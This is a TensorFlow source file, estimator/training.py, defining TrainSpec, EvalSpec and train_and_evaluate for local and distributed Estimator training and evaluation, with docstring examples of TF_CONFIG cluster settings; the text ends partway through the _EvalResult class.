Zwysilence/tensorflow
|
b55001be83da044bb21d539d433dec6231eaec55
|
[
"Apache-2.0"
] | 4
|
2021-06-15T17:26:07.000Z
|
2021-11-17T10:58:08.000Z
|
tensorflow/python/estimator/training.py
|
Zwysilence/tensorflow
|
b55001be83da044bb21d539d433dec6231eaec55
|
[
"Apache-2.0"
] | 4
|
2020-09-26T00:55:50.000Z
|
2022-02-10T01:53:06.000Z
|
tensorflow/python/estimator/training.py
|
Zwysilence/tensorflow
|
b55001be83da044bb21d539d433dec6231eaec55
|
[
"Apache-2.0"
] | 6
|
2018-12-20T01:35:20.000Z
|
2020-07-10T17:29:57.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes and functions related to train_and_evaluate."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import os
import time
import six
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.distribute import estimator_training as distribute_coordinator_training
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import exporter as exporter_lib
from tensorflow.python.estimator import run_config as run_config_lib
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import server_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import compat
from tensorflow.python.util.tf_export import estimator_export
_MAX_DELAY_SECS = 60
_DELAY_SECS_PER_WORKER = 5
_TF_CONFIG_ENV = 'TF_CONFIG'
_ENVIRONMENT_KEY = 'environment'
_ENVIRONMENT_GOOGLE_VALUE = 'google'
_TRAINER_JOBS = (run_config_lib.TaskType.CHIEF, run_config_lib.TaskType.MASTER,
run_config_lib.TaskType.WORKER)
def _validate_input_fn(input_fn):
"""Validates the `input_fn`."""
if not callable(input_fn):
raise TypeError('`input_fn` must be callable, given: {}'.format(input_fn))
def _validate_hooks(hooks):
"""Validates the `hooks`."""
hooks = tuple(hooks or [])
for hook in hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError(
'All hooks must be `SessionRunHook` instances, given: {}'.format(
hook))
return hooks
def _validate_exporters(exporters):
"""Validates `exporters` and returns them as a tuple."""
if not exporters:
return ()
if isinstance(exporters, exporter_lib.Exporter):
exporters = [exporters]
unique_names = [] # `Exporter`s should have unique names.
try:
for exporter in exporters:
if not isinstance(exporter, exporter_lib.Exporter):
# Error message will be printed out by the outer try/except.
raise TypeError
if not exporter.name:
full_list_of_names = [e.name for e in exporters]
raise ValueError('An Exporter cannot have a name that is `None` or'
' empty. All exporter names:'
' {}'.format(full_list_of_names))
if not isinstance(exporter.name, six.string_types):
raise ValueError('An Exporter must have a string name. Given: '
'{}'.format(type(exporter.name)))
if exporter.name in unique_names:
full_list_of_names = [e.name for e in exporters]
raise ValueError(
'`exporters` must have unique names. Such a name cannot be `None`.'
' All exporter names: {}'.format(full_list_of_names))
unique_names.append(exporter.name)
except TypeError:
# Two possibilities:
# - `exporters` is neither `Exporter` nor iterable. Python has
# raised a `TypeError` when iterating over `exporters`.
# - an `exporter` was None or not of type `Exporter`, so we raised a
# `TypeError`.
raise TypeError('`exporters` must be an Exporter,'
' an iterable of Exporter, or `None`,'
' found %s.' % exporters)
return tuple(exporters)
def _is_google_env():
"""Detects whether current environment is google."""
tf_config = json.loads(os.environ.get(_TF_CONFIG_ENV) or '{}')
if not tf_config:
logging.warn('TF_CONFIG should not be empty in distributed environment.')
return tf_config.get(_ENVIRONMENT_KEY) == _ENVIRONMENT_GOOGLE_VALUE
@estimator_export('estimator.TrainSpec')
class TrainSpec(
collections.namedtuple('TrainSpec', ['input_fn', 'max_steps', 'hooks'])):
"""Configuration for the "train" part for the `train_and_evaluate` call.
`TrainSpec` determines the input data for the training, as well as the
duration. Optional hooks run at various stages of training.
"""
def __new__(cls, input_fn, max_steps=None, hooks=None):
"""Creates a validated `TrainSpec` instance.
Args:
input_fn: A function that provides input data for training as minibatches.
See [Premade Estimators](https://tensorflow.org/guide/premade_estimators#create_input_functions)
for more information. The function should construct and return one of
the following:
* A 'tf.data.Dataset' object: Outputs of `Dataset` object must be a
tuple (features, labels) with same constraints as below.
* A tuple (features, labels): Where features is a `Tensor` or a
dictionary of string feature name to `Tensor` and labels is a
`Tensor` or a dictionary of string label name to `Tensor`.
max_steps: Int. Positive number of total steps for which to train model.
If `None`, train forever. The training `input_fn` is not expected to
generate `OutOfRangeError` or `StopIteration` exceptions. See the
`train_and_evaluate` stop condition section for details.
hooks: Iterable of `tf.train.SessionRunHook` objects to run
on all workers (including chief) during training.
Returns:
A validated `TrainSpec` object.
Raises:
ValueError: If any of the input arguments is invalid.
TypeError: If any of the arguments is not of the expected type.
"""
# Validate input_fn.
_validate_input_fn(input_fn)
# Validate max_steps.
if max_steps is not None and max_steps <= 0:
raise ValueError(
'Must specify max_steps > 0, given: {}'.format(max_steps))
# Validate hooks.
hooks = _validate_hooks(hooks)
return super(TrainSpec, cls).__new__(
cls, input_fn=input_fn, max_steps=max_steps, hooks=hooks)
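# Illustrative only (hypothetical input_fn): a typical spec caps training at a fixed
# number of global steps, e.g.
#   train_spec = TrainSpec(input_fn=my_train_input_fn, max_steps=10000)
# max_steps <= 0 raises ValueError in __new__ above; hooks run on every worker.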
@estimator_export('estimator.EvalSpec')
class EvalSpec(
collections.namedtuple('EvalSpec', [
'input_fn', 'steps', 'name', 'hooks', 'exporters', 'start_delay_secs',
'throttle_secs'
])):
"""Configuration for the "eval" part for the `train_and_evaluate` call.
`EvalSpec` combines details of evaluation of the trained model as well as its
export. Evaluation consists of computing metrics to judge the performance of
the trained model. Export writes out the trained model on to external
storage.
"""
def __new__(cls,
input_fn,
steps=100,
name=None,
hooks=None,
exporters=None,
start_delay_secs=120,
throttle_secs=600):
"""Creates a validated `EvalSpec` instance.
Args:
input_fn: A function that constructs the input data for evaluation.
See [Premade Estimators](https://tensorflow.org/api_guides/premade_estimators#create_input_functions)
for more information. The function should construct and return one of
the following:
* A 'tf.data.Dataset' object: Outputs of `Dataset` object must be a
tuple (features, labels) with same constraints as below.
* A tuple (features, labels): Where features is a `Tensor` or a
dictionary of string feature name to `Tensor` and labels is a
`Tensor` or a dictionary of string label name to `Tensor`.
steps: Int. Positive number of steps for which to evaluate model. If
`None`, evaluates until `input_fn` raises an end-of-input exception.
See `Estimator.evaluate` for details.
name: String. Name of the evaluation if user needs to run multiple
evaluations on different data sets. Metrics for different evaluations
are saved in separate folders, and appear separately in tensorboard.
hooks: Iterable of `tf.train.SessionRunHook` objects to run
during evaluation.
exporters: Iterable of `Exporter`s, or a single one, or `None`.
`exporters` will be invoked after each evaluation.
start_delay_secs: Int. Start evaluating after waiting for this many
seconds.
throttle_secs: Int. Do not re-evaluate unless the last evaluation was
started at least this many seconds ago. Of course, evaluation does not
occur if no new checkpoints are available, hence, this is the minimum.
Returns:
A validated `EvalSpec` object.
Raises:
ValueError: If any of the input arguments is invalid.
TypeError: If any of the arguments is not of the expected type.
"""
# Validate input_fn.
_validate_input_fn(input_fn)
# Validate steps.
if steps is not None and steps <= 0:
raise ValueError('Must specify steps > 0, given: {}'.format(steps))
# Validate name.
if name is not None and not isinstance(name, six.string_types):
raise TypeError('`name` must be string, given: {}'.format(name))
# Validate hooks.
hooks = _validate_hooks(hooks)
# Validate exporters.
exporters = _validate_exporters(exporters)
# Validate start_delay_secs.
if start_delay_secs < 0:
raise ValueError('Must specify start_delay_secs >= 0, given: {}'.format(
start_delay_secs))
# Validate throttle_secs.
if throttle_secs < 0:
raise ValueError(
'Must specify throttle_secs >= 0, given: {}'.format(throttle_secs))
return super(EvalSpec, cls).__new__(
cls,
input_fn=input_fn,
steps=steps,
name=name,
hooks=hooks,
exporters=exporters,
start_delay_secs=start_delay_secs,
throttle_secs=throttle_secs)
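# Illustrative only (hypothetical input_fn / serving_input_receiver_fn): evaluate on each
# new checkpoint, but at most every 10 minutes, exporting a SavedModel each time, e.g.
#   eval_spec = EvalSpec(input_fn=my_eval_input_fn, steps=None,
#                        exporters=exporter_lib.LatestExporter(
#                            'saved_model', my_serving_input_receiver_fn),
#                        throttle_secs=600)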
@estimator_export('estimator.train_and_evaluate')
def train_and_evaluate(estimator, train_spec, eval_spec):
"""Train and evaluate the `estimator`.
This utility function trains, evaluates, and (optionally) exports the model by
using the given `estimator`. All training related specification is held in
`train_spec`, including training `input_fn` and training max steps, etc. All
evaluation and export related specification is held in `eval_spec`, including
evaluation `input_fn`, steps, etc.
This utility function provides consistent behavior for both local
(non-distributed) and distributed configurations. The default distribution
configuration is parameter server-based between-graph replication. For other
types of distribution configurations such as all-reduce training, please use
[DistributionStrategies](https://github.com/tensorflow/tensorflow/tree/master/tensorflow/contrib/distribute). # pylint: disable=line-too-long
Overfitting: In order to avoid overfitting, it is recommended to set up the
training `input_fn` to shuffle the training data properly.
Stop condition: In order to support both distributed and non-distributed
configuration reliably, the only supported stop condition for model
training is `train_spec.max_steps`. If `train_spec.max_steps` is `None`, the
model is trained forever. *Use with care* if model stop condition is
different. For example, assume that the model is expected to be trained with
one epoch of training data, and the training `input_fn` is configured to throw
`OutOfRangeError` after going through one epoch, which stops the
`Estimator.train`. For a three-training-worker distributed configuration, each
training worker is likely to go through the whole epoch independently. So, the
model will be trained with three epochs of training data instead of one epoch.
Example of local (non-distributed) training:
```python
# Set up feature columns.
categorial_feature_a = categorical_column_with_hash_bucket(...)
categorial_feature_a_emb = embedding_column(
categorical_column=categorial_feature_a, ...)
... # other feature columns
estimator = DNNClassifier(
feature_columns=[categorial_feature_a_emb, ...],
hidden_units=[1024, 512, 256])
# Or set up the model directory
# estimator = DNNClassifier(
# config=tf.estimator.RunConfig(
# model_dir='/my_model', save_summary_steps=100),
# feature_columns=[categorial_feature_a_emb, ...],
# hidden_units=[1024, 512, 256])
# Input pipeline for train and evaluate.
def train_input_fn(): # returns x, y
# please shuffle the data.
pass
def eval_input_fn(): # returns x, y
pass
train_spec = tf.estimator.TrainSpec(input_fn=train_input_fn, max_steps=1000)
eval_spec = tf.estimator.EvalSpec(input_fn=eval_input_fn)
tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
```
Note that in the current implementation `estimator.evaluate` will be called
multiple times. This means that evaluation graph (including eval_input_fn)
will be re-created for each `evaluate` call. `estimator.train` will be called
only once.
Example of distributed training:
Regarding the example of distributed training, the code above can be used
without a change (Please do make sure that the `RunConfig.model_dir` for all
workers is set to the same directory, i.e., a shared file system all workers
can read and write). The only extra work to do is setting the environment
variable `TF_CONFIG` properly for each worker correspondingly.
Also see
[Distributed TensorFlow](https://www.tensorflow.org/deploy/distributed).
Setting environment variable depends on the platform. For example, on Linux,
it can be done as follows (`$` is the shell prompt):
```
$ TF_CONFIG='<replace_with_real_content>' python train_model.py
```
For the content in `TF_CONFIG`, assume that the training cluster spec looks
like:
```
cluster = {"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]}
```
Example of `TF_CONFIG` for chief training worker (must have one and only one):
```
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "chief", "index": 0}
}'
```
Note that the chief worker also does the model training job, similar to other
non-chief training workers (see next paragraph). In addition to the model
training, it manages some extra work, e.g., checkpoint saving and restoring,
writing summaries, etc.
Example of `TF_CONFIG` for non-chief training worker (optional, could be
multiple):
```
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "worker", "index": 0}
}'
```
where the `task.index` should be set as 0, 1, 2, in this example, respectively
for non-chief training workers.
Example of `TF_CONFIG` for parameter server, aka ps (could be multiple):
```
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "ps", "index": 0}
}'
```
where the `task.index` should be set as 0 and 1, in this example, respectively
for parameter servers.
Example of `TF_CONFIG` for evaluator task. Evaluator is a special task that is
not part of the training cluster. There could be only one. It is used for
model evaluation.
```
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "evaluator", "index": 0}
}'
```
When `distribute` or `experimental_distribute.train_distribute` and
`experimental_distribute.remote_cluster` is set, this method will start a
client running on the current host which connects to the `remote_cluster` for
training and evaluation.
Args:
estimator: An `Estimator` instance to train and evaluate.
train_spec: A `TrainSpec` instance to specify the training specification.
eval_spec: A `EvalSpec` instance to specify the evaluation and export
specification.
Returns:
A tuple of the result of the `evaluate` call to the `Estimator` and the
export results using the specified `ExportStrategy`.
Currently, the return value is undefined for distributed training mode.
Raises:
ValueError: if environment variable `TF_CONFIG` is incorrectly set.
"""
_assert_eval_spec(eval_spec) # fail fast if eval_spec is invalid.
executor = _TrainingExecutor(
estimator=estimator, train_spec=train_spec, eval_spec=eval_spec)
config = estimator.config
# If `distribute_coordinator_mode` is set and running in distributed
# environment, we run `train_and_evaluate` via distribute coordinator.
if distribute_coordinator_training.should_run_distribute_coordinator(config):
logging.info('Running `train_and_evaluate` with Distribute Coordinator.')
distribute_coordinator_training.train_and_evaluate(
estimator, train_spec, eval_spec, _TrainingExecutor)
return
if (config.task_type == run_config_lib.TaskType.EVALUATOR and
config.task_id > 0):
raise ValueError(
'For distributed training, there can only be one `evaluator` task '
'(with task id 0). Given task id {}'.format(config.task_id))
return executor.run()
class _StopAtSecsHook(session_run_hook.SessionRunHook):
"""Stops given secs after begin is called."""
def __init__(self, stop_after_secs):
self._stop_after_secs = stop_after_secs
self._start_time = None
def begin(self):
self._start_time = time.time()
def after_run(self, run_context, run_values):
del run_values
if time.time() - self._start_time >= self._stop_after_secs:
run_context.request_stop()
class _NewCheckpointListenerForEvaluate(
basic_session_run_hooks.CheckpointSaverListener):
"""A saver listener to run evaluate with every checkpoint."""
def __init__(self, evaluator, eval_throttle_secs, continuous_eval_listener):
self._evaluator = evaluator
self._eval_throttle_secs = eval_throttle_secs
self._continuous_eval_listener = continuous_eval_listener
self.eval_result, self.export_results = None, None
def begin(self):
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=self._eval_throttle_secs)
self._is_first_run = True
def after_save(self, session, global_step_value):
del session # unused; required by signature.
# Skip the first run; the model is not trained yet.
if self._is_first_run:
self._is_first_run = False
return
if not self._continuous_eval_listener.before_eval():
logging.info('Exiting training and evaluation loop, as requested by '
'_ContinuousEvalListener.before_eval.')
return True
if self._timer.should_trigger_for_step(global_step_value):
self._evaluate(global_step_value) # updates self.eval_result
if not self._continuous_eval_listener.after_eval(self.eval_result):
logging.info('Exiting evaluation, as requested by '
'_ContinuousEvalListener.after_eval.')
return True
else:
# TODO(ispir): add remaining time in the log.
logging.info('Skip the current checkpoint eval due to throttle secs '
'({} secs).'.format(self._eval_throttle_secs))
def end(self, session, global_step_value):
# Evaluate if the last step has not been evaluated, yet.
if global_step_value != self._timer.last_triggered_step():
if self._continuous_eval_listener.before_eval():
self._evaluate(global_step_value)
self._continuous_eval_listener.after_eval(self.eval_result)
def _evaluate(self, global_step_value):
self._timer.update_last_triggered_step(global_step_value)
self.eval_result, self.export_results = (
self._evaluator.evaluate_and_export())
if self.eval_result.status != _EvalStatus.EVALUATED:
# This is unexpected; should never happen.
# Training should always end with a new checkpoint.
raise RuntimeError('There was no new checkpoint after the training. '
'Eval status: {}'.format(self.eval_result.status))
class _TrainingExecutor(object):
"""The executor to run `Estimator` training and evaluation.
This implementation supports both distributed and non-distributed (aka local)
training and evaluation based on the setting in `tf.estimator.RunConfig`.
"""
def __init__(self,
estimator,
train_spec,
eval_spec,
train_hooks=None,
continuous_eval_listener=None):
if not isinstance(estimator, estimator_lib.Estimator):
raise TypeError(
'`estimator` must have type `tf.estimator.Estimator`. '
'Got: {}'.format(type(estimator)))
self._estimator = estimator
if not isinstance(train_spec, TrainSpec):
raise TypeError(
'`train_spec` must have type `tf.estimator.TrainSpec`. '
'Got: {}'.format(type(train_spec)))
self._train_spec = train_spec
if eval_spec and not isinstance(eval_spec, EvalSpec):
raise TypeError('`eval_spec` must be either `None` or have type '
'`tf.estimator.EvalSpec`. Got: {}'.format(
type(eval_spec)))
self._eval_spec = eval_spec
self._train_hooks = _validate_hooks(train_hooks)
if (continuous_eval_listener and
not isinstance(continuous_eval_listener, _ContinuousEvalListener)):
raise TypeError('`continuous_eval_listener` must have type '
'`_ContinuousEvalListener`.')
self._continuous_eval_listener = (
continuous_eval_listener or _ContinuousEvalListener())
@property
def estimator(self):
return self._estimator
def run(self):
"""Executes the run_foo for task type `foo`.
`_TrainingExecutor` predefines the procedure for task type 'chief',
'worker', 'ps', and 'evaluator'. For task type `foo`, the corresponding
procedure is `run_foo`. This `run` method invokes the procedure based on the
`RunConfig.task_type`.
Returns:
A tuple of the result of the `evaluate` call to the `Estimator` and the
export results using the specified `ExportStrategy`.
Currently undefined for distributed training mode.
Raises:
ValueError: if the estimator.config is mis-configured.
"""
config = self._estimator.config
if (not config.cluster_spec and
config.task_type != run_config_lib.TaskType.EVALUATOR):
logging.info('Running training and evaluation locally (non-distributed).')
return self.run_local()
# Distributed case.
if not config.task_type:
# TODO(xiejw): Improve the error message about how to set the TF_CONFIG
# correctly.
raise ValueError(
'`estimator.config` must have task_type set. This usually means '
'TF_CONFIG environment is not set correctly.')
if config.task_type == 'local':
raise ValueError(
'`task.type` in TF_CONFIG cannot be `local`. Leaving `cluster` and '
'`task` properties in TF_CONFIG absent triggers train and evaluate '
'`Estimator` locally (non-distributed).')
# For task type foo, call executor.run_foo.
available_tasks = [
x for x in dir(self)
if x.startswith('run_') and x != 'run_local' and
callable(getattr(self, x))
]
task_to_run = 'run_' + config.task_type
if task_to_run not in available_tasks:
raise ValueError(
'Task type {} is not supported. Supported task types are {}'.format(
config.task_type, [x[len('run_'):] for x in available_tasks]))
getattr(self, task_to_run)()
def run_chief(self):
"""Runs task chief."""
# TODO(xiejw): To allow execution framework to add train hooks.
return self._start_distributed_training()
def run_worker(self):
"""Runs task (training) worker."""
# TODO(xiejw): To allow execution framework to add train hooks.
return self._start_distributed_training()
def run_master(self):
"""Runs task master."""
_assert_eval_spec(self._eval_spec)
# Final export signal: For any eval result with global_step >= train
# max_steps, the evaluator will send the final export signal. There is a
# small chance that the Estimator.train stopping logic sees a different
# global_step value (due to global step race condition and the fact the
# saver sees a larger value for checkpoint saving), which does not end
# the training. When the training ends, a new checkpoint is generated, which
# triggers the listener again. So, it could be the case the final export is
# triggered twice.
#
# But here, throttle_secs will skip the next intermediate checkpoint and,
# so, the double final export chance is very small.
evaluator = _TrainingExecutor._Evaluator(self._estimator, self._eval_spec,
self._train_spec.max_steps)
# When the underlying `Estimator` object saves a new checkpoint, we would
# like this callback to be called so that evaluation and export can trigger.
saving_listeners = [
_NewCheckpointListenerForEvaluate(evaluator,
self._eval_spec.throttle_secs,
_ContinuousEvalListener())
]
self._start_distributed_training(saving_listeners=saving_listeners)
def run_evaluator(self):
"""Runs task evaluator."""
# TODO(xiejw): To allow execution framework to add continuous eval listener.
return self._start_continuous_evaluation()
def run_ps(self):
"""Runs task parameter server (in training cluster spec)."""
config = self._estimator.config
server = self._start_std_server(config)
server.join()
def run_local(self):
"""Runs training and evaluation locally (non-distributed)."""
_assert_eval_spec(self._eval_spec)
train_hooks = list(self._train_spec.hooks) + list(self._train_hooks)
logging.info('Start train and evaluate loop. The evaluate will happen '
'after every checkpoint. Checkpoint frequency is determined '
'based on RunConfig arguments: save_checkpoints_steps {} or '
'save_checkpoints_secs {}.'.format(
self._estimator.config.save_checkpoints_steps,
self._estimator.config.save_checkpoints_secs))
evaluator = _TrainingExecutor._Evaluator(self._estimator, self._eval_spec,
self._train_spec.max_steps)
listener_for_eval = _NewCheckpointListenerForEvaluate(
evaluator, self._eval_spec.throttle_secs,
self._continuous_eval_listener)
saving_listeners = [listener_for_eval]
self._estimator.train(
input_fn=self._train_spec.input_fn,
max_steps=self._train_spec.max_steps,
hooks=train_hooks,
saving_listeners=saving_listeners)
eval_result = listener_for_eval.eval_result or _EvalResult(
status=_EvalStatus.MISSING_CHECKPOINT)
return eval_result.metrics, listener_for_eval.export_results
def _start_std_server(self, config):
"""Creates, starts, and returns a server_lib.Server."""
if (not config.cluster_spec or not config.task_type or
config.task_id is None):
raise RuntimeError('Could not start server; be sure to specify '
'cluster_spec, task_type, and task in '
'RunConfig or set the TF_CONFIG environment variable.')
if not config.master:
jobs = config.cluster_spec.jobs
if (len(jobs) == 1 and
len(config.cluster_spec.job_tasks(jobs[0])) == 1 and
config.task_type in _TRAINER_JOBS):
# For distributed training, config.master is empty if and only if it has
# a single node in the cluster spec. In this case, we should not start
# the server.
logging.info('Skip starting Tensorflow server as there is only one '
'node in the cluster.')
return
else:
raise RuntimeError(
'Could not start server; be sure to specify master in '
'RunConfig or set the TF_CONFIG environment variable.')
logging.info('Start Tensorflow server.')
if config.session_config is None:
session_config = config_pb2.ConfigProto(log_device_placement=False)
else:
session_config = config_pb2.ConfigProto(
log_device_placement=False,
gpu_options=config.session_config.gpu_options)
server = server_lib.Server(
config.cluster_spec,
job_name=config.task_type,
task_index=config.task_id,
config=session_config,
start=False,
protocol=config.protocol)
server.start()
return server
def _start_distributed_training(self, saving_listeners=None):
"""Calls `Estimator` train in a distributed setting."""
config = self._estimator.config
# Start in-process TensorFlow server if needed. It's important to start the
# server before we (optionally) sleep. Otherwise, the servers will wait to
# connect to each other before starting to train.
if not _is_google_env():
self._start_std_server(config)
# Delay worker to start. For asynchronous training, this usually helps model
# to converge faster. Chief starts the training immediately, so, worker
# with task id x (0-based) should wait (x+1) * _DELAY_SECS_PER_WORKER.
start_delay_secs = 0
if config.task_type == run_config_lib.TaskType.WORKER:
# TODO(xiejw): Replace the hard code logic (task_id + 1) with unique id in
# training cluster.
start_delay_secs = min(_MAX_DELAY_SECS,
(config.task_id + 1) * _DELAY_SECS_PER_WORKER)
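# For example, with _DELAY_SECS_PER_WORKER = 5 the worker with task_id 2 waits
# min(_MAX_DELAY_SECS, (2 + 1) * 5) = 15 seconds before training starts.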
if start_delay_secs > 0:
logging.info('Waiting %d secs before starting training.',
start_delay_secs)
time.sleep(start_delay_secs)
self._estimator.train(
input_fn=self._train_spec.input_fn,
max_steps=self._train_spec.max_steps,
hooks=list(self._train_spec.hooks) + list(self._train_hooks),
saving_listeners=saving_listeners)
def _start_continuous_evaluation(self):
"""Repeatedly calls `Estimator` evaluate and export until training ends."""
_assert_eval_spec(self._eval_spec)
start_delay_secs = self._eval_spec.start_delay_secs
if start_delay_secs:
logging.info('Waiting %f secs before starting eval.', start_delay_secs)
time.sleep(start_delay_secs)
latest_eval_result = None
evaluator = _TrainingExecutor._Evaluator(self._estimator, self._eval_spec,
self._train_spec.max_steps)
should_early_stop = False
while not should_early_stop:
if (latest_eval_result and
latest_eval_result.status == _EvalStatus.EVALUATED):
global_step = latest_eval_result.metrics.get(ops.GraphKeys.GLOBAL_STEP)
if (global_step and self._train_spec.max_steps and
global_step >= self._train_spec.max_steps):
logging.info(
'Exiting evaluation, global_step=%s >= train max_steps=%s',
global_step, self._train_spec.max_steps)
return
latest_eval_result, should_early_stop = self._execute_evaluator_once(
evaluator, self._continuous_eval_listener,
self._eval_spec.throttle_secs)
def _execute_evaluator_once(self, evaluator, continuous_eval_listener,
throttle_secs):
"""Executes the `evaluator`."""
_assert_eval_spec(self._eval_spec)
start = time.time()
eval_result = None
should_early_stop = False
if not continuous_eval_listener.before_eval():
logging.info('Exiting evaluation, as requested by '
'_ContinuousEvalListener.before_eval.')
should_early_stop = True
return (eval_result, should_early_stop)
# Final export signal: For any eval result with global_step >= train
# max_steps, the evaluator will send the final export signal. The next
# iteration of while loop will end the continuous eval as the stopping
# condition is satisfied (both checks use the same global_step value,
# i.e., no race condition)
eval_result, _ = evaluator.evaluate_and_export()
if not self._continuous_eval_listener.after_eval(eval_result):
logging.info('Exiting evaluation, as requested by '
'_ContinuousEvalListener.after_eval.')
should_early_stop = True
return (eval_result, should_early_stop)
# Throttle if necessary.
elapsed_time = time.time() - start
difference = throttle_secs - elapsed_time
if difference > 0:
logging.info('Waiting %f secs before starting next eval run.', difference)
time.sleep(difference)
elif (throttle_secs == 0 and
eval_result.status != _EvalStatus.EVALUATED):
# Prints a user-actionable warning to avoid unnecessary load on evaluator.
logging.warning(
'EvalSpec.throttle_secs is set as 0. This might overload the job '
'before finding (next) new checkpoint. Please consider to increase '
'it.')
return (eval_result, should_early_stop)
class _Evaluator(object):
"""A helper class to call `Estimator.evaluate` and export model."""
def __init__(self, estimator, eval_spec, max_training_steps):
self._estimator = estimator
_assert_eval_spec(eval_spec)
self._eval_spec = eval_spec
self._is_final_export_triggered = False
self._previous_ckpt_path = None
self._last_warning_time = 0
self._max_training_steps = max_training_steps
@property
def is_final_export_triggered(self):
return self._is_final_export_triggered
def evaluate_and_export(self):
"""Evaluate and (maybe) export the current model.
Returns:
A tuple of `EvalResult` instance and the export results.
Raises:
RuntimeError: for any unexpected internal error.
TypeError: if evaluation result has wrong type.
"""
latest_ckpt_path = self._estimator.latest_checkpoint()
if not latest_ckpt_path:
self._log_err_msg('Estimator is not trained yet. Will start an '
'evaluation when a checkpoint is ready.')
return _EvalResult(status=_EvalStatus.MISSING_CHECKPOINT), []
if latest_ckpt_path == self._previous_ckpt_path:
self._log_err_msg(
'No new checkpoint ready for evaluation. Skip the current '
'evaluation pass as evaluation results are expected to be same '
'for the same checkpoint.')
return _EvalResult(status=_EvalStatus.NO_NEW_CHECKPOINT), []
metrics = self._estimator.evaluate(
input_fn=self._eval_spec.input_fn,
steps=self._eval_spec.steps,
name=self._eval_spec.name,
checkpoint_path=latest_ckpt_path,
hooks=self._eval_spec.hooks)
# _EvalResult validates the metrics.
eval_result = _EvalResult(
status=_EvalStatus.EVALUATED,
metrics=metrics,
checkpoint_path=latest_ckpt_path)
is_the_final_export = (
eval_result.metrics[ops.GraphKeys.GLOBAL_STEP] >=
self._max_training_steps if self._max_training_steps else False)
export_results = self._export_eval_result(eval_result,
is_the_final_export)
if is_the_final_export:
logging.debug('Calling exporter with the `is_the_final_export=True`.')
self._is_final_export_triggered = True
self._last_warning_time = 0
self._previous_ckpt_path = latest_ckpt_path
return eval_result, export_results
def _log_err_msg(self, message):
"""Prints warning `message` every 10 mins."""
current_time = time.time()
if current_time - self._last_warning_time > 600:
logging.warning(message)
self._last_warning_time = current_time
def _export_eval_result(self, eval_result, is_the_final_export):
"""Export `eval_result` according to exporters in `EvalSpec`."""
export_dir_base = os.path.join(
compat.as_str_any(self._estimator.model_dir),
compat.as_str_any('export'))
export_results = []
for exporter in self._eval_spec.exporters:
export_results.append(
exporter.export(
estimator=self._estimator,
export_path=os.path.join(
compat.as_str_any(export_dir_base),
compat.as_str_any(exporter.name)),
checkpoint_path=eval_result.checkpoint_path,
eval_result=eval_result.metrics,
is_the_final_export=is_the_final_export))
return export_results
class _EvalStatus(object):
"""The status of an evaluation event.
For local training and evaluation, the status can only be `EVALUATED` as
`Estimator.train` always generates a new checkpoint.
For distributed training and evaluation, a separate evaluator keeps looking
for new checkpoints, so multiple situations might occur:
- EVALUATED: A new checkpoint is found since last evaluation.
`Estimator.evaluate` will be invoked.
- MISSING_CHECKPOINT: No checkpoint can be found. Typically, this means
the trainer has not yet produced any checkpoint.
- NO_NEW_CHECKPOINT: No new checkpoint can be found since last evaluation.
Typically, this means the trainer has not yet produced any new checkpoint.
"""
EVALUATED = 'evaluated'
MISSING_CHECKPOINT = 'missing checkpoint'
NO_NEW_CHECKPOINT = 'no new checkpoint'
class _EvalResult(
collections.namedtuple('EvalResult',
['status', 'metrics', 'checkpoint_path'])):
"""_EvalResult holds the result of an evaluation event."""
def __new__(cls, status, metrics=None, checkpoint_path=None):
"""Creates a validated `_EvalResult`.
Args:
status: See `_EvalStatus`.
metrics: The evaluation results returned by `Estimator.evaluate`. Only set
if status is `EVALUATED`.
checkpoint_path: The corresponding checkpoint path for the `metrics`. Only
set if status is `EVALUATED`.
Returns:
A validated `_EvalResult` object.
Raises:
ValueError: If validation fails.
TypeError: If any of the arguments is not the expected type.
"""
if status != _EvalStatus.EVALUATED:
if metrics:
raise ValueError(
'metrics must be `None` if status is not {}; got status {},'
' metrics {}'.format(_EvalStatus.EVALUATED, status, metrics))
if checkpoint_path:
raise ValueError(
'checkpoint must be `None` if status is not {}; got status {}, '
'checkpoint_path {}'.format(_EvalStatus.EVALUATED, status,
checkpoint_path))
return super(_EvalResult, cls).__new__(cls, status, metrics,
checkpoint_path)
# Now, evaluated case.
assert status == _EvalStatus.EVALUATED
# Validates metrics.
if not metrics:
raise ValueError(
'Internal error: `Estimator.evaluate` should never return empty '
'metrics.')
if not isinstance(metrics, dict):
raise TypeError(
'`Estimator.evaluate` should return dict. Given {}.'.format(
type(metrics)))
